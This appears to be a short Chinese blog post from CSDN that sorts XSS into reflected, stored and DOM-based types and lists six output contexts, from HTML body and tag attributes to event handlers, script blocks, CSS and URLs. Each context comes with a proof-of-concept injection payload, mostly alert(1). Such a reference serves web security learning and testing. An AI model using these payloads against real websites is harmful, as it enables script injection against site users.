版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/cemao4548/article/details/81194659
XSS存在的常见形态
xss分为 反射、存储、based Dom三种类型
按照输出位置区分,有六种常见输出类型,下文列举。
html中输出
将用户可控变量记做$var
则有<div>$var</div>型
payload如<img src=1 onerror=alert(1)>
标签属性中输出
形如<div name="$var"></div>
payload<div name=" "><script>alert(1)</script><" "></div>
标签事件中输出
形如<img src=1 onerror="funcA('$var')">
payload <img src=1 onerror="funcA(' ');alert(1);//' )">
script标签中输出
形如<script>var x = "$var";</script>
payload
<script>var x = " ";alert(1); </script>
css中输出
形如<div style="$var">
payload <div style=" width:expression(alert('xss')); ">
url中输出
形如<a href="htpp://www.baidu.com/index.php?id=$var">
payload<a href="htpp://www.baidu.com/index.php?id= 1" onclick=alert(1)" ">